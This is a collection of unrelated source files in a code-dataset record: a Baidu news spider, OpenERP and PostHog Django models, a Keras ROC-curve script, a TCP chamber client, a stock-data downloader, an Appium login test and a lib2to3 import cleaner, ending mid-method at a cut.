'InternetNews', 'DiscoveryNews', 'LadyNews', 'PicWall', 'HealthNews']\n allurl=[]\n for k in range(0, len(allid)):\n thisurl = \"http://news.baidu.com/widget?id=\" + allid[k] + \"&ajax=json\"\n allurl.append(thisurl)\n\n\n def parse(self, response):\n #print(self.allid)\n for m in range(0, len(self.allurl)):\n print(\"第\" + str(m) + \"个栏目\")\n yield Request(self.allurl[m], callback=self.next)\n\n def next(self, response):\n\n #thisid = self.allurl[j]\n #print(\"第\"+str(j)+\"个栏目\")\n data=response.body.decode(\"utf-8\", \"ignore\")\n pat1 = '\"m_relate_url\":\"(.*?)\"'\n pat2 = '\"url\":\"(.*?)\"'\n url1 = re.compile(pat1, re.S).findall(data)\n url2 = re.compile(pat2, re.S).findall(data)\n if(len(url1)!=0):\n url=url1\n\n else:\n url=url2\n print(url)\n for i in range(0,len(url)):\n thisurl = re.sub(\"\\\\\\/\",\"/\",url[i])\n print(thisurl)\n yield Request(thisurl, callback=self.next2)\n def next2(self, response):\n item = BaidunewsItem()\n item[\"link\"]=response.url\n item[\"title\"]=response.xpath(\"/html/head/title/text()\").extract()\n item[\"content\"]=response.body\n yield item\n","sub_path":"baidunews/baidunews/spiders/n1.py","file_name":"n1.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"340871422","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (c) 2010-2014 Elico Corp. All Rights Reserved.\n# Qing Wang \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nfrom openerp.osv import osv\nfrom openerp import SUPERUSER_ID\n\n\nclass sale_order(osv.Model):\n _inherit = 'sale.order'\n\n # def _portal_payment_block(\n # self, cr, uid, ids, fieldname, arg, context=None):\n # result = dict.fromkeys(ids, False)\n # payment_acquirer = self.pool.get('portal.payment.acquirer')\n # for this in self.browse(cr, SUPERUSER_ID, ids, context=context):\n # if this.state not in ('draft', 'quotation', 'cancel')\\\n # and not this.invoiced:\n # result[this.id] = payment_acquirer.render_payment_block(\n # cr, uid, this, this.name,\n # this.pricelist_id.currency_id,\n # this.amount_total, context=context)\n # return result\n\n def _portal_payment_block(\n self, cr, uid, ids, fieldname, arg, context=None):\n result = dict.fromkeys(ids, False)\n payment_acquirer = self.pool['payment.acquirer']\n for this in self.browse(cr, SUPERUSER_ID, ids, context=context):\n if this.state not in ('draft', 'cancel') and not this.invoiced:\n result[this.id] = payment_acquirer.render_payment_block(\n cr, uid, this.name, this.amount_total, this.pricelist_id.currency_id.id,\n partner_id=this.partner_id.id, company_id=this.company_id.id, context=context)\n return result\n","sub_path":"portal_supplier_account/portal_sale.py","file_name":"portal_sale.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"541188436","text":"import argparse\nfrom keras.datasets import mnist, cifar10\nfrom utils import write_file\nfrom keras import utils\nfrom keras.models import load_model, Model\nimport numpy as np\nfrom utils import load_file\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import roc_auc_score\nfrom threshold_sa import get_correct_and_incorrect_instance, normalize_sa \n\nCLIP_MIN = -0.5\nCLIP_MAX = 0.5\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--d\", \"-d\", help=\"Dataset\", type=str, default=\"mnist\")\n\n args = parser.parse_args()\n assert args.d in [\"mnist\", \"cifar\"], \"Dataset should be either 'mnist' or 'cifar'\" \n print(args)\n \n if args.d == 'cifar':\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n \n x_train = x_train.astype(\"float32\")\n x_train = (x_train / 255.0) - (1.0 - CLIP_MAX)\n x_test = x_test.astype(\"float32\")\n x_test = (x_test / 255.0) - (1.0 - CLIP_MAX)\n\n # number of class\n num_class = 10\n y_train = utils.to_categorical(y_train, num_class)\n y_test = utils.to_categorical(y_test, num_class)\n\n model = load_model('./model_tracking/cifar_model_improvement-496-0.87.h5')\n model.summary()\n\n # # # # evaluate\n # # scores = model.evaluate(x_test, y_test, batch_size=128, verbose=1)\n # # print('\\nEvaluation result: %.3f loss: %.3f' % (scores[1]*100,scores[0]))\n # # exit()\n\n y_pred = model.predict(x_test)\n true_score = get_correct_and_incorrect_instance(y_pred=y_pred, y_true=y_test) \n \n y_conf = np.amax(y_pred, axis=1)\n fpr_conf, tpr_conf, _ = roc_curve(true_score, y_conf)\n roc_auc_conf = auc(fpr_conf, tpr_conf)\n\n y_lsa = load_file('./sa/lsa_%s.txt' % (args.d)) \n y_lsa = [-float(s) for s in y_lsa]\n fpr_lsa, tpr_lsa, _ = roc_curve(true_score, y_lsa)\n roc_auc_lsa = auc(fpr_lsa, tpr_lsa)\n\n y_dsa = load_file('./sa/dsa_%s.txt' % (args.d)) \n y_dsa = [-float(s) for s in y_dsa]\n fpr_dsa, tpr_dsa, _ = roc_curve(true_score, y_dsa)\n roc_auc_dsa = auc(fpr_dsa, tpr_dsa)\n\n # method I: plt\n import matplotlib.pyplot as plt\n plt.title('Receiver Operating Characteristic')\n plt.plot(fpr_conf, tpr_conf, 'b', label = 'AUC_conf = %0.2f' % roc_auc_conf)\n plt.plot(fpr_lsa, tpr_lsa, 'c', label = 'AUC_lsa = %0.2f' % roc_auc_lsa)\n plt.plot(fpr_dsa, tpr_dsa, 'g', label = 'AUC_dsa = %0.2f' % roc_auc_dsa)\n plt.legend(loc = 'lower right')\n plt.plot([0, 1], [0, 1],'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1.05])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.savefig('roc_curve_%s.jpg' % (args.d))\n\n\n # # calculate AUC\n # auc = roc_auc_score(true_score, y_score)\n # print('AUC score of %s dataset' % (args.d))\n \n # fpr = dict()\n # tpr = dict()\n # roc_auc = dict()\n # for i in range(num_class):\n # fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\n # roc_auc[i] = auc(fpr[i], tpr[i])\n\n # # Compute micro-average ROC curve and ROC area\n # fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\n # roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n \n # plt.figure()\n # lw = 2\n # plt.plot(fpr[2], tpr[2], color='darkorange',\n # lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\n # plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n # plt.xlim([0.0, 1.0])\n # plt.ylim([0.0, 1.05])\n # plt.xlabel('False Positive Rate')\n # plt.ylabel('True Positive Rate')\n # plt.title('Receiver operating characteristic of confidence score')\n # plt.legend(loc=\"lower right\")\n # plt.savefig('roc_curve_%s.jpg' % (args.d)) \n # plt.close()\n\n \n\n ","sub_path":"roc_curve.py","file_name":"roc_curve.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4956205","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor: YJ\nEmail: yj1516268@outlook.com\nCreated Date: 2018-11-07 14:22:51\n\n\n\"\"\"\n\nimport toml\nimport time\nimport struct\nimport socket\n\n\nconf = toml.load(\"./resource/conf/conf.toml\")\n\nhost = '192.168.1.2'\nport = 7777\n\ncmds = conf['command'].get('Command', None)\nnames = conf['command'].get('Name', None)\nindex = conf['command'].get('Chamber-ID', '1')\nparams = conf['command'].get('Param', None)\n\n# CONTROL VALUES & MEASURING VALUES\ncmd_ctrl = cmds[0:6]\ncmd_mse = cmds[6:]\nname_ctrl = names[0:6]\nname_mse = names[6:]\nparam_ctrl = params[0:6]\nparam_mse = params[0:14]\n\ncommands = []\norder_keys = {}\n\n# commands -- CONTROL VALUES\nfor cmd in cmd_ctrl:\n for param in param_ctrl:\n command = {\"cmd\": \"{}\".format(cmd), \"chamber_index\": index, \"param\": param, }\n commands.append(command)\n\n# commands -- MEASURING VALUES\nfor cmd in cmd_mse:\n for param in param_mse:\n command = {\"cmd\": \"{}\".format(cmd), \"chamber_index\": index, \"param\": param, }\n commands.append(command)\n\n# order_keys -- CONTROL VALUES\nfor k, v in enumerate(name_ctrl):\n for param in param_ctrl:\n key = (\"{}\".format(cmd_ctrl[k]), param)\n value = name_ctrl[k]\n order_keys.update({key: value})\n\n# order_keys -- MEASURING VALUES\nfor k, v in enumerate(name_mse):\n for param in param_mse:\n key = (\"{}\".format(cmd_mse[k]), param)\n value = name_mse[k]\n order_keys.update({key: value})\n\n\ndef pack_data(command):\n \"\"\"\n convert request to bytes\n \"\"\"\n SR = 182 # separator\n CR = 13 # terminator\n\n cmd = command['cmd']\n chamber_index = command['chamber_index']\n params = command['param']\n\n fmt_header = \"{0}s1B{1}s1B\".format(len(cmd), len(chamber_index))\n fmt_body = \"\"\n for param in params:\n fmt_body = fmt_body + \"{0}s1B\".format(len(param))\n fmt_tail = \"1B\"\n fmt = fmt_header + fmt_body + fmt_tail\n\n params = [param.encode() for param in params]\n\n # insert SR to params, egg.[param1, SR, param2, SR ...]\n for i in range(len(params)):\n params.insert(2*i+1, SR)\n\n bytes_data = struct.pack(\n fmt, cmd.encode(), SR, chamber_index.encode(), SR, *params, CR\n )\n\n return bytes_data\n\n\ndef sendrecv(s, command):\n s.sendall(command)\n bytes_data = s.recv(8192)\n return bytes_data\n\n\ndef decode_data(bytes_data):\n contents = bytes_data.split(b'\\r')[0]\n error_flag = b'-'\n if contents.startswith(error_flag):\n return None\n else:\n data = contents.split(b'\\xb6')[1].decode()\n return data\n\nif __name__ == '__main__':\n for num, command in enumerate(commands):\n command = pack_data(command)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(('192.168.1.2', 7777))\n bytes_data = sendrecv(s, command)\n data = decode_data(bytes_data)\n print(\"{}: {}\".format(num+1, data))\n","sub_path":"client_syncio.py","file_name":"client_syncio.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"513323448","text":"import math\nimport os\nimport shutil\nimport time\nimport urllib.request\n\n\n# period1 and period2 are Unix time stamps for your start and end date\n# interval is the data retrieval interval (this can be either 1d, 1w or 1m)\n\n\ndef pull_all_data():\n with open(\"data/Lists/sp5002012.txt\", \"r\") as file:\n for line in file:\n company = line.strip()\n print(company)\n print(\"\\n\")\n pull_historical_data(company)\n try:\n filename = make_filename(company)\n src = os.getcwd()\n dst = src + \"/data\"\n shutil.move(os.path.join(src, filename), os.path.join(dst, filename))\n except:\n print(\"Error moving file\")\n\n\ndef pull_specific_stocks(stocks):\n \"\"\"Download data of specific stocks from yahoo finance\"\"\"\n for stock in stocks:\n\n print(\"Downloading historical data for: \" + stock)\n pull_historical_data(stock)\n\n try:\n filename = make_filename((stock))\n src = os.getcwd()\n dst = src + \"/data\"\n shutil.move(os.path.join(src, filename), os.path.join(dst, filename))\n except Exception as e:\n print(\"Error moving file\")\n print(e)\n\n\ncurrent_time = str(math.floor(time.time()))\n\n\n# Times:\n# 2019-01-01 : 1546300800\n# 2000-01-01 : 946684800\n\n\ndef make_url(\n ticker_symbol, period1=\"946684800\", period2=current_time, interval=\"1d\",\n):\n return \"https://query1.finance.yahoo.com/v7/finance/download/{}?period1={}&period2={}&interval={}&events=history\".format(\n ticker_symbol, period1, period2, interval\n )\n\n\ndef make_filename(ticker_symbol):\n return ticker_symbol + \".csv\"\n\n\ndef pull_historical_data(ticker_symbol):\n try:\n urllib.request.urlretrieve(\n make_url(ticker_symbol), make_filename(ticker_symbol)\n )\n # except urllib.request.ContentTooShortError as e:\n # outfile = open(make_filename(ticker_symbol, directory), \"w\")\n # outfile.write(e.content)\n # outfile.close()\n except:\n print(\"Error Fetching stock, may not exist\")\n\n\nif __name__ == \"__main__\":\n # pull_all_data()\n stocks = ['GOOG', 'AAPL', 'GLD', 'ZM', 'COST', 'UAL']\n pull_specific_stocks(stocks)\n","sub_path":"historical_data.py","file_name":"historical_data.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"630029358","text":"\"\"\"\n检查字符串的头或者尾是否符合要求\n\n应用1:URL协议的检查(头部检查)\n应用2:文件类型检查(尾部检查,即文件扩展名检查)\n\"\"\"\n\nfilename = 'spam.txt'\nprint(filename.endswith('.txt'))\n# 下面是可以达到同样作用的语句,但是在本例中不推荐(因为不优雅)\nprint(filename[-4:] == '.txt')\n#import re\n#print(re.match('.txt', filename))\n\nurl = 'http://www.python.org'\nprint(url.startswith('http'))\n\nimport os\nfilename = os.listdir('.')\n# 一次性检查多个模式需要提供一个元组作为参数\n# 如果想要提供list或者set的话,一定要确保先用tuple()转换成tuple\n# 注:type()是强制类型转换的一种,平时并不推荐使用,只在一些特殊的情况使用\nprint([name for name in filename if name.endswith(('.gitignore', '.md'))])\n\n# any接收的是一个iterable\nprint(any(name.endswith('.h') for name in filename))\n\n# 应用举例:根据协议类型决定如何打开文件\nfrom urllib.request import urlopen\n\ndef read_data(urlname_or_filename):\n if urlname_or_filename.startswith(('http:', 'https:', 'ftp:')):\n return urlopen(urlname_or_filename).read()\n else:\n with open(urlname_or_filename) as f:\n return f.read()\n","sub_path":"string_2/str_2_2_startswith_endswith.py","file_name":"str_2_2_startswith_endswith.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"632434503","text":"from appium import webdriver\n\ncaps = {\n \"platformName\": \"Android\",\n \"platformVersion\": \"5.1.1\",\n \"deviceName\": \"127.0.0.1:62001\",\n \"appPackage\": \"com.lqr.wechat\",\n \"appActivity\": \"com.lqr.wechat.ui.activity.SplashActivity\",\n \"noReset\": True\n # \"unicodeKeyboard\": True,\n # \"resetKeyboard\": True,\n # \"automationName\": \"uiautomator2\",\n}\n\ndriver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\n\nresults = driver.find_elements_by_id(\"com.lqr.wechat:id/btnLogin\")\n\nif results:\n print(\"存在登录按钮,未登录\")\n results[0].click()\n driver.find_element_by_id(\"com.lqr.wechat:id/etPhone\").send_keys(\"18010181267\")\n driver.find_element_by_id(\"com.lqr.wechat:id/etPwd\").send_keys(\"123456\")\n login_btn = driver.find_element_by_id(\"com.lqr.wechat:id/btnLogin\")\n if login_btn.get_attribute(\"enabled\"):\n print(\"可用\")\n login_btn.click()\n else:\n print(\"不可用\")\nelse:\n print(\"不存在登录按钮, 已登录\")\n\n# 查找通讯录并输出属性\ncontacts = driver.find_element_by_id(\"com.lqr.wechat:id/tvContactsTextPress\")\nprint(contacts.get_attribute('resourceId'))\nprint(contacts.get_attribute('className'))\nprint(contacts.get_attribute('displayed'))\n\ndriver.quit()\n","sub_path":"practice/myLove/appium/Day02/wechat_if_login.py","file_name":"wechat_if_login.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"557042464","text":"from contextlib import contextmanager\nfrom lib2to3.fixer_base import BaseFix\nfrom lib2to3.fixer_util import (\n BlankLine, FromImport, Leaf, Newline, syms, token)\nfrom lib2to3.refactor import RefactoringTool\n\n\ndef traverse_imports(names):\n \"\"\"\n Walks over all the names imported in a dotted_as_names node.\n \"\"\"\n pending = [names]\n while pending:\n node = pending.pop()\n if node.type in {token.NAME, token.STAR}:\n yield node.value\n elif node.type == syms.dotted_name:\n yield \"\".join([ch.value for ch in node.children])\n elif node.type in {syms.dotted_as_name, syms.import_as_name}:\n yield node.children[2].value\n elif node.type in {syms.dotted_as_names, syms.import_as_names}:\n pending.extend(node.children[::-2])\n else:\n raise ValueError(\"unknown node type\", node.type)\n\n\nclass RefactorImports(BaseFix):\n\n PATTERN = r\"\"\"\n simple_stmt<\n (\n import_name< 'import' imp=any >\n |\n import_from< 'from' imp=(['.'*] any) 'import' ['('] items=any [')'] >\n ) '\\n'\n >\n \"\"\"\n\n def __init__(self):\n self.unused_modules = []\n super().__init__(None, None) # options and logger\n\n @contextmanager\n def clean(self, unused_modules):\n try:\n self.unused_modules.clear()\n self.unused_modules.extend(unused_modules)\n yield\n finally:\n self.unused_modules.clear()\n\n def transform(self, node, results):\n imp = self.get_imp_if_equal_to_lineno(node.get_lineno())\n if imp:\n if node.children[0].type == syms.import_from:\n return self.import_from(node, results, imp)\n elif node.children[0].type == syms.import_name:\n return self.import_name(node, results)\n\n def import_from(self, node, results, imp):\n if imp[\"star\"]:\n if not imp[\"modules\"]:\n return BlankLine()\n else:\n package_name = imp[\"module\"].__name__\n name_leafs = [\n Leaf(\n token.NAME,\n \", \".join(sorted(imp[\"modules\"])),\n prefix=\" \",\n ),\n Newline(),\n ]\n return FromImport(package_name, name_leafs)\n return self.transform_inner_children(node, results[\"items\"])\n\n def import_name(self, node, results):\n return self.transform_inner_children(node, results[\"imp\"])\n\n def get_imp_if_equal_to_lineno(self, lineno):\n for imp in self.unused_modules:\n if imp[\"lineno\"] == lineno:\n return imp\n\n def transform_inner_children(self, node, imports):\n if imports.type == syms.import_as_name or not imports.children:\n children = [imports]\n else:\n children = imports.children\n trailing_comma = None\n if children[-1].type == token.COMMA:\n # if end of children's char is equal to ',' then remove it\n trailing_comma = children.pop()\n commas = children[1:-1:2]\n module_nodes = children[::2]\n modules = tuple(traverse_imports(imports))\n remove_counter = 0\n for index, module in enumerate(modules):\n if self.is_module_unused(module, node):\n if commas:\n if index + 1 == len(modules):\n comma = commas.pop(index - remove_counter - 1)\n if trailing_comma:\n trailing_comma.remove()\n trailing_comma = None\n else:\n comma = commas.pop(index - remove_counter)\n comma.remove()\n module_nodes.pop(index - remove_counter).remove()\n remove_counter += 1\n if remove_counter == len(modules):\n return BlankLine()\n if trailing_comma:\n children.append(trailing_comma)\n\n def is_module_unused(self, import_name, node):\n for imp in self.unused_modules:\n if (\n imp[\"name\"] == import_name\n and imp[\"lineno\"] == node.get_lineno()\n ):\n return imp\n\n\nclass RefactorTool(RefactoringTool):\n def __init__(self):\n self._fixer = RefactorImports()\n self._fixers = [self._fixer]\n super().__init__(None, options={\"print_function\": True})\n\n def get_fixers(self):\n return self._fixers, []\n\n def refactor_string(self, data, unused_imports, name=\"unimport\"):\n with self._fixer.clean(unused_imports):\n source = super().refactor_string(data, name)\n return str(source)\n","sub_path":"unimport/refactor.py","file_name":"refactor.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"152938684","text":"from django.db import models\nfrom django.contrib.postgres.fields import JSONField, ArrayField\nfrom django.conf import settings\nfrom django.contrib.auth.models import AbstractUser, BaseUserManager\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.dispatch import receiver\nfrom django.forms.models import model_to_dict\nfrom django.utils import timezone\nfrom typing import List, Tuple, Optional, Any, Union, Dict\nfrom django.db import transaction\nfrom sentry_sdk import capture_exception\n\nimport secrets\nimport re\n\ndef split_selector_into_parts(selector: str) -> List:\n tags = selector.split(' > ')\n tags.reverse()\n ret: List[Dict[str, Union[str, List]]] = []\n for tag in tags:\n data: Dict[str, Union[str, List]] = {}\n if 'id=' in tag:\n id_regex = r\"\\[id=\\'(.*)']\"\n result = re.match(id_regex, tag)\n return [{'attr_id': result[1]}] # type: ignore\n if 'nth-child(' in tag:\n parts = tag.split(':nth-child(')\n data['nth_child'] = parts[1].replace(')', '')\n tag = parts[0]\n if '.' in tag:\n parts = tag.split('.')\n data['attr_class'] = parts[1:]\n tag = parts[0]\n data['tag_name'] = tag\n ret.append(data)\n return ret\n\nclass UserManager(BaseUserManager):\n \"\"\"Define a model manager for User model with no username field.\"\"\"\n\n use_in_migrations = True\n\n def _create_user(self, email, password, **extra_fields):\n \"\"\"Create and save a User with the given email and password.\"\"\"\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n if hasattr(settings, 'RESTRICT_SIGNUPS') and settings.RESTRICT_SIGNUPS and email.rsplit('@', 1)[1] not in settings.RESTRICT_SIGNUPS.split(','):\n raise ValueError(\"Can't sign up with this email\")\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_user(self, email, password=None, **extra_fields):\n \"\"\"Create and save a regular User with the given email and password.\"\"\"\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n if not settings.TEST:\n extra_fields.setdefault('distinct_id', secrets.token_urlsafe(32))\n return self._create_user(email, password, **extra_fields)\n\n def create_superuser(self, email, password, **extra_fields):\n \"\"\"Create and save a SuperUser with the given email and password.\"\"\"\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have is_staff=True.')\n if extra_fields.get('is_superuser') is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n return self._create_user(email, password, **extra_fields)\n\nclass User(AbstractUser):\n username = None # type: ignore\n email = models.EmailField(_('email address'), unique=True)\n temporary_token: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n distinct_id: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS: List[str] = []\n\n objects = UserManager() # type: ignore\n\n\nclass Team(models.Model):\n users: models.ManyToManyField = models.ManyToManyField(User, blank=True)\n api_token: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n app_url: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n name: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n opt_out_capture: models.BooleanField = models.BooleanField(default=False)\n\n def __str__(self):\n if self.name:\n return self.name\n if self.app_url:\n return self.app_url\n return str(self.pk)\n\n@receiver(models.signals.post_save, sender=Team)\ndef create_team_signup_token(sender, instance, created, **kwargs):\n # Don't do this when running tests to speed up\n if created and not settings.TEST:\n if not instance.api_token:\n instance.api_token = secrets.token_urlsafe(32)\n instance.save()\n\nclass EventManager(models.Manager):\n def _handle_nth_child(self, index, item, where, params):\n where.append(\"AND E{}.nth_child = %s\".format(index))\n params.append(item)\n\n def _handle_tag_name(self, index, item, where, params):\n where.append(\"AND E{}.tag_name = %s\".format(index))\n params.append(item)\n\n def _handle_id(self, index, item, where, params):\n where.append(\"AND E{}.attr_id = %s\".format(index))\n params.append(item)\n\n def _handle_class(self, index, item, where, params):\n where.append(\"AND E{}.attr_class @> %s::varchar(200)[]\".format(index))\n params.append(item)\n\n def _filter_selector(self, filters, joins, where, params):\n selector = filters.pop('selector')\n parts = split_selector_into_parts(selector)\n for index, tag in enumerate(parts):\n if tag.get('nth_child'):\n self._handle_nth_child(index, tag['nth_child'], where=where, params=params)\n if tag.get('attr_id'):\n self._handle_id(index, tag['attr_id'], where=where, params=params)\n if tag.get('attr_class'):\n self._handle_class(index, tag['attr_class'], where=where, params=params)\n if tag.get('tag_name'):\n self._handle_tag_name(index, tag['tag_name'], where=where, params=params)\n if index > 0:\n joins.append('INNER JOIN posthog_element E{0} ON (posthog_event.id = E{0}.event_id)'.format(index))\n where.append('AND E{0}.order = (( E{1}.order + 1))'.format(index, index-1))\n\n def _filters(self, filters, where: List, params: List):\n for key, value in filters.items():\n if key == 'url' and value:\n where.append('AND posthog_event.properties ->> \\'$current_url\\' LIKE %s')\n params.append('%{}%'.format(value))\n elif key == 'event' and value:\n where.append('AND posthog_event.event = %s')\n params.append(value)\n elif key not in ['action', 'id', 'selector'] and value:\n where.append('AND E0.{} = %s'.format(key))\n params.append(value)\n\n def _step(self, step, joins: List, where: List, params: List):\n filters = model_to_dict(step)\n where.append(' OR (1=1 ')\n if filters['selector']:\n filter_selector = self._filter_selector(filters, joins=joins, where=where, params=params)\n self._filters(filters, where=where, params=params)\n where.append(')')\n\n def _select(self, count=None, group_by=None, group_by_table=None, count_by=None):\n if count_by:\n return \"SELECT date_trunc('{0}', posthog_event.timestamp) as {0}, COUNT(1) as id FROM posthog_event \".format(count_by)\n if group_by:\n return \"SELECT DISTINCT ON (posthog_persondistinctid.person_id) {}.{} as id, posthog_event.id as event_id FROM posthog_event \".format(group_by_table, group_by)\n if count:\n return \"SELECT COUNT(posthog_event.id) as id FROM posthog_event \"\n return \"\"\"\n SELECT \"posthog_event\".\"id\", \n \"posthog_event\".\"team_id\", \n \"posthog_event\".\"event\", \n \"posthog_event\".\"distinct_id\", \n \"posthog_event\".\"properties\",\n \"posthog_event\".\"elements\", \n \"posthog_event\".\"timestamp\", \n \"posthog_event\".\"ip\",\n \"posthog_persondistinctid\".\"person_id\" as person_id\n FROM \"posthog_event\" \"\"\"\n\n def filter_by_action(self, action, count: Optional[bool]=None, group_by: Optional[str]=None, count_by: Optional[str]=None, group_by_table: Optional[str]=None, limit: Optional[int]=None, where: Optional[Union[str, List[Any]]]=None) -> models.query.RawQuerySet:\n query = self._select(count=count, group_by=group_by, group_by_table=group_by_table, count_by=count_by)\n\n joins: List[str] = [\n 'INNER JOIN posthog_persondistinctid ON (posthog_event.distinct_id = posthog_persondistinctid.distinct_id AND posthog_persondistinctid.team_id = {}) '.format(action.team_id),\n 'LEFT OUTER JOIN posthog_element E0 ON (posthog_event.id = E0.event_id)'\n ]\n where_list: List[str] = []\n params: List[str] = []\n\n for step in action.steps.all():\n self._step(step, joins=joins, where=where_list, params=params)\n\n query += ' '.join(joins)\n query += ' WHERE '\n query += ' posthog_event.team_id = {}'.format(action.team_id)\n query += ' AND (1=2 '\n query += ' '.join(where_list)\n query += ') '\n if where:\n if isinstance(where, list):\n for w in where:\n query += ' AND {}'.format(w[0])\n params.extend(w[1])\n elif where != '':\n query += ' AND ({})'.format(where)\n\n if group_by:\n query += ' GROUP BY {}.{}, posthog_event.id'.format(group_by_table, group_by)\n if count_by:\n query += ' GROUP BY day'\n if not count and not group_by and not count_by:\n query += ' ORDER BY posthog_event.timestamp DESC'\n if limit:\n query += ' LIMIT %s' % limit\n events = Event.objects.raw(query, params)\n if count:\n return events[0].id # bit of a hack to get the total count here\n return events\n\n\nclass Event(models.Model):\n @property\n def person(self):\n return Person.objects.get(team_id=self.team_id, persondistinctid__distinct_id=self.distinct_id)\n\n def _element_matches_selector(self, elements, selector: Dict, order=None):\n for element in elements:\n if order != None and order != element.order:\n continue\n if selector.get('tag_name') and selector['tag_name'] != element.tag_name:\n continue\n if selector.get('attr_class') and (not element.attr_class or not all(name in element.attr_class for name in selector['attr_class'])):\n continue\n if selector.get('nth_child') and selector['nth_child'] != element.nth_child:\n continue\n if selector.get('attr_id') and selector['attr_id'] != element.attr_id:\n continue\n return element\n return False\n\n def _event_matches_selector(self, event, selector: str) -> bool:\n elements = event.element_set.all()\n prev = None\n parts = split_selector_into_parts(selector)\n for tag in parts:\n prev = self._element_matches_selector(\n elements=elements,\n order=prev.order + 1 if prev else None, # type: ignore\n selector=tag)\n if not prev:\n return False\n return True\n\n def _element_matches_step(self, filters: Dict, element) -> bool:\n match = True\n for key, value in filters.items():\n if getattr(element, key) != value:\n match = False\n return match\n\n def _event_matches_step(self, event, step) -> bool:\n filters = model_to_dict(step)\n filters.pop('action')\n filters.pop('id')\n filters = {key: value for key, value in filters.items() if value}\n\n if filters.get('url'):\n if event.properties.get('$current_url') != filters['url']:\n return False\n filters.pop('url')\n if filters.get('event'):\n if event.event != filters['event']:\n return False\n filters.pop('event')\n if len(filters.keys()) == 0 and event.element_set.count() == 0:\n # if no more filters to apply, and no elements, means it was a pageview/event filter so can return\n return True\n if filters.get('selector'):\n if not self._event_matches_selector(event, filters['selector']):\n return False\n filters.pop('selector')\n for element in event.element_set.all():\n if self._element_matches_step(filters, element):\n return True\n return False\n\n @property\n def actions(self) -> List:\n action_steps = ActionStep.objects.filter(action__team_id=self.team_id).select_related('action')\n actions: List[Dict] = []\n for step in action_steps:\n if step.action not in actions:\n if self._event_matches_step(self, step):\n actions.append(step.action)\n return actions\n\n objects = EventManager()\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n event: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n distinct_id: models.CharField = models.CharField(max_length=200)\n properties: JSONField = JSONField(default=dict)\n elements: JSONField = JSONField(default=list, null=True, blank=True)\n timestamp: models.DateTimeField = models.DateTimeField(default=timezone.now, blank=True)\n ip: models.GenericIPAddressField = models.GenericIPAddressField(null=True, blank=True)\n\nclass PersonManager(models.Manager):\n def create(self, *args: Any, **kwargs: Any):\n with transaction.atomic():\n if not kwargs.get('distinct_ids'):\n return super().create(*args, **kwargs)\n distinct_ids = kwargs.pop('distinct_ids')\n person = super().create(*args, **kwargs)\n person.add_distinct_ids(distinct_ids)\n return person\n\nclass Person(models.Model):\n @property\n def distinct_ids(self) -> List[str]:\n if hasattr(self, 'distinct_ids_cache'):\n return [id.distinct_id for id in self.distinct_ids_cache] # type: ignore\n return [id[0] for id in PersonDistinctId.objects.filter(person=self).order_by('id').values_list('distinct_id')]\n\n def add_distinct_id(self, distinct_id: str) -> None:\n PersonDistinctId.objects.create(person=self, distinct_id=distinct_id, team=self.team)\n\n def 